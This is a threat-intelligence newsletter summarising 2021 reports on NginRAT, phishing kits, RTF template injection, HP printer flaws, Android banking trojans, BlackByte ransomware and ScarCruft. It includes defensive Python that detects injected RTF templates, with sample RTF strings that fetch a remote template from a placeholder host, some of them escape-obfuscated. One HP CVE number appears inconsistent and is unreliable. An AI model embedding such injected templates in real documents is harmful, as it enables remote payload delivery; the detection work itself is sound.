Saturday, June 29, 2024

Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More

This recurring multi-threat intelligence story from Anomali Cyber Watch covers the following topics: APT, Ransomware, Maldocs, E-commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to the Anomali Cyber Watch and can be used to check your logs for potentially malicious activity.


Figure 1 – IOC Summary Chart. This chart summarizes the IOCs attached to this issue and outlines the threats discussed.

Latest cyber news and threat intelligence

New malware hides as a legitimate Nginx process on e-commerce servers

(Posted: December 2, 2021)

Researchers at Sansec have discovered NginRAT, a new malware variant found on servers in the US, Germany and France. Deployed to intercept credit card payments, the malware impersonates a legitimate nginx process, which makes it very difficult to detect. NginRAT appeared on systems previously infected with CronRAT, a Trojan that hides its scheduled tasks by setting them to run on an invalid calendar date. It serves as a persistence technique, ensuring that the malware can re-infect the system even if the malicious process is terminated.
Analyst Comments: Threat actors are always adapting to the security landscape to remain effective. New techniques can still be spotted through behavioral-analysis defenses and social engineering training. Make sure your company's firewall blocks all entry points for unauthorized users, and keep a record of what normal traffic looks like on your network. This makes it easier to spot anomalous traffic and connections to and from your network and to identify potentially malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Shared Modules – T1129
tag: NginRAT, CronRAT, Nginx, North America, EU

How Phishing Kits Are Enabling a New Generation of Professional Phishers

(Posted: December 2, 2021)

Phishing kits such as XBALTI are increasingly being used against financial institutions and their customers. By mixing email and SMS messages, attackers target the customers of companies such as Charles Schwab, JP Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are asked to verify their account details; after harvesting the information, the kit redirects them to the real site, making the attack appear legitimate.
Analyst Comments: With financial transactions on the rise at this time of year, finance-themed malware spam and phishing emails are likely to be common tactics. It is therefore important for employees to be aware of their financial institution's policies regarding electronic communications. If users are worried by the intimidating tactics often used in these emails, they should contact their financial institution through a legitimate channel. Requests to open documents that are urgent in tone and contain incorrect grammar often indicate a spam or phishing attack. Such emails should be avoided and reported to the appropriate person(s).
tag: Phishing, XBALTI

Injection is the New Black: Novel RTF template injection technique poised for adoption beyond APT actors

(Posted: December 1, 2021)

Proofpoint threat researchers observed the adoption of a new and easily implemented phishing-attachment technique by APT threat actors in the second and third quarters of 2021. The technique, called RTF template injection, abuses legitimate RTF template functionality: it subverts the plain-text document formatting properties of an RTF file and, through RTF's template control word, causes a URL resource to be retrieved instead of a file resource. This allows threat actors to replace a legitimate file target with a URL that fetches a remote payload.
Analyst Comments: Threat actors deliver malware in a variety of ways and constantly update their TTPs, making analysis and detection more difficult. Educate your staff on the methods attackers use to distribute malware (compromised websites, malicious files, phishing, spear phishing, exploitation of vulnerabilities, etc.).
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution – T1203 | [MITRE ATT&CK] Masquerading – T1036 | [MITRE ATT&CK] File and Directory Discovery – T1083 | [MITRE ATT&CK] Non-Application Layer Protocol – T1095 | [MITRE ATT&CK] Ingress Tool Transfer – T1105 | [MITRE ATT&CK] Application Layer Protocol – T1071
tag: Phishing, APT, RTF malware
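The RTF template injection item above describes the mechanism; as an added example (not code from the Proofpoint report or from Anomali), the Python below extracts the `\*\template` destination from an RTF document, resolves the hex and unicode escapes some samples use to hide the URL, and flags a remote target. The RTF samples are constructed and `example.invalid` is a placeholder host.

```python
import re

# Constructed RTF samples (not real malware). The remote host is a placeholder.
BENIGN_RTF = r"{\rtf1\ansi{\*\template C:\Users\alice\Templates\report.dotx}\pard Hello}"
INJECTED_RTF = r"{\rtf1\ansi{\*\template http://example.invalid/t.dotm}\pard Hello}"
# The same injection with the scheme hex-escaped (\'hh) or unicode-escaped (\uN?),
# both of which defeat a naive grep for "http".
HEX_ESCAPED_RTF = r"{\rtf1\ansi{\*\template \'68\'74\'74\'70://example.invalid/t.dotm}\pard Hello}"
UNI_ESCAPED_RTF = r"{\rtf1\ansi{\*\template \u104?ttp://example.invalid/t.dotm}\pard Hello}"

# {\*\template <target>} is the destination group the technique abuses.
TEMPLATE_RE = re.compile(r"\{\\\*\\template\s*([^}]*)\}", re.IGNORECASE)
HEX_RE = re.compile(r"\\'([0-9a-fA-F]{2})")
UNI_RE = re.compile(r"\\u(-?\d+)\??")
# A template target should be a local path; a URL or UNC path means Word fetches it remotely.
REMOTE_RE = re.compile(r"^\s*(https?://|\\\\)", re.IGNORECASE)


def decode_rtf_text(s: str) -> str:
    """Resolve \\'hh and \\uN? escapes so obfuscated targets compare like plain text."""
    s = HEX_RE.sub(lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), s)
    s = UNI_RE.sub(lambda m: chr(int(m.group(1)) % 65536), s)
    return s


def extract_template_targets(rtf: str) -> list:
    """Return every decoded \\*\\template target found in the document."""
    return [decode_rtf_text(m.group(1)).strip() for m in TEMPLATE_RE.finditer(rtf)]


def is_remote_template(rtf: str) -> bool:
    """True if any template destination points at a URL or a UNC path."""
    return any(REMOTE_RE.search(t) for t in extract_template_targets(rtf))


if __name__ == "__main__":
    samples = [("benign", BENIGN_RTF), ("injected", INJECTED_RTF),
               ("hex-escaped", HEX_ESCAPED_RTF), ("unicode-escaped", UNI_ESCAPED_RTF)]
    for name, sample in samples:
        print(f"{name}: targets={extract_template_targets(sample)} remote={is_remote_template(sample)}")
```

A real mail gateway or sandbox rule would run the same check over the raw bytes of every RTF attachment, and treat any remote template target as a detection rather than as a normal document feature.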

HP Printer Hijacking Bugs Impact 150 Models

(Posted: December 1, 2021)

F-Secure security consultants Timo Hirvonen and Alexander Bolshev discovered two vulnerabilities in multifunction printers (MFPs). The vulnerabilities, registered as CVE-2021-39237 and CVE-2022-39238, were found in HP's "FutureSmart" MFP "M725z" devices dating back to 2013. In a "cross-site printing" attack, a malicious website triggers the flaws on a vulnerable device, allowing arbitrary code execution and theft of print, scan and fax data as well as passwords. Due to the nature of the CVEs, multiple MFPs on the same network can be affected automatically. HP has released patches for the vulnerabilities.
Analyst Comments: Threat actors often attempt to exploit older vulnerabilities that are already patched, because a great deal of open-source information about them is available. This makes exploitation easier, since proof-of-concept code is available and ready to be weaponized. Applying patches can also disrupt interoperability between the software used by your organization, so having a patch policy and a business continuity plan in place is critical to maintaining a good security posture.
tag: CVE-2021-39237, CVE-2022-39238, HP

Did you recently download that Android malware from the Play Store?

(Posted: December 1, 2021)

Security researchers found banking trojans on the Google Play Store that had been downloaded by more than 300,000 Android users. The apps themselves appear legitimate and may have nothing to do with banking at all; many known samples pose as QR readers, fitness apps and document scanners. They are hard to detect because they filter activation by region, Android version and various other factors. Often the malicious code is not present when the app is downloaded: the app first profiles the device and only then carries out malicious actions or downloads additional code.
Analyst Comments: Android users should download software only from the Google Play Store and not install software from unverified sources, because it is easy for malicious applications to get into third-party stores. Applications that request permissions beyond their normal functionality should be treated with suspicion, and the normal functioning of an application should be carefully reviewed before installation. Where available, antivirus applications should be deployed on devices, especially devices that may hold sensitive information.
MITRE ATT&CK: [MITRE ATT&CK] Non-Standard Port – T1571
tag: Anatsa, Alien, Hydra, Ermac, Android, Malware, Banking

Microsoft Exchange Server Hacked to Deploy BlackByte Ransomware

(Posted: December 1, 2021)

A known ransomware group, BlackByte, is exploiting Microsoft Exchange servers through the ProxyShell vulnerabilities to deliver ransomware. ProxyShell is the name for a set of three Microsoft Exchange vulnerabilities that, when chained together, allow unauthenticated remote code execution on the server. Once a server is compromised, the attackers use Cobalt Strike to move laterally through systems and networks. Firewall rules, Active Directory security settings and PowerShell are also abused during the worm-like propagation stage. The vulnerabilities were patched by security updates released in April and May 2021. Threat actors are now using ProxyShell to install web shells, coin miners and ransomware.
Analyst Comments: Impersonating legitimate services is an effective phishing tactic for delivering malware. All employees should be informed of the threat phishing poses, how to identify such attempts, and whom to notify when they are identified. Follow appropriate patching schedules and regularly scan for infrastructure changes. Most importantly, do not pay cybercriminals. Implement a backup solution so that users can recover important and sensitive data.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application – T1190 | [MITRE ATT&CK] Ingress Tool Transfer – T1105 | [MITRE ATT&CK] Process Injection – T1055 | [MITRE ATT&CK] OS Credential Dumping – T1003 | [MITRE ATT&CK] Modify Registry – T1112 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] Inhibit System Recovery – T1490 | [MITRE ATT&CK] Data Encrypted for Impact – T1486
tag: BlackByte, ProxyShell, Microsoft Exchange, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207

ScarCruft monitors North Korean defectors and human rights activists

(Posted: November 29, 2021)

ScarCruft (also known as APT37 or Temp.Reaper) is a state-sponsored Advanced Persistent Threat (APT) group known for targeting North Korean defectors, reporters covering news related to North Korea, and government agencies concerned with the Korean Peninsula. The attackers, active since 2016, use stolen Facebook or email credentials to profile their victims, then send spear-phishing emails containing RAR archives with malicious Word documents.
Analyst Comments: These malicious activities are most likely carried out with the backing of the North Korean government. Anomali researchers have previously reported on phishing domains and credential theft by North Korean actors. Government agencies will always be seen as holding valuable information, so actors seeking that information (other governments) will target those agencies in an attempt to steal it for strategic purposes.
MITRE ATT&CK: [MITRE ATT&CK] Phishing – T1566 | [MITRE ATT&CK] Command and Scripting Interpreter – T1059 | [MITRE ATT&CK] Boot or Logon Autostart Execution – T1547 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Masquerading – T1036 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] Screen Capture – T1113 | [MITRE ATT&CK] Archive Collected Data – T1560 | [MITRE ATT&CK] Application Layer Protocol – T1071 | [MITRE ATT&CK] Encrypted Channel – T1573 | [MITRE ATT&CK] Exfiltration Over C2 Channel – T1041
tag: APT37, Reaper, ScarCruft, North Korea
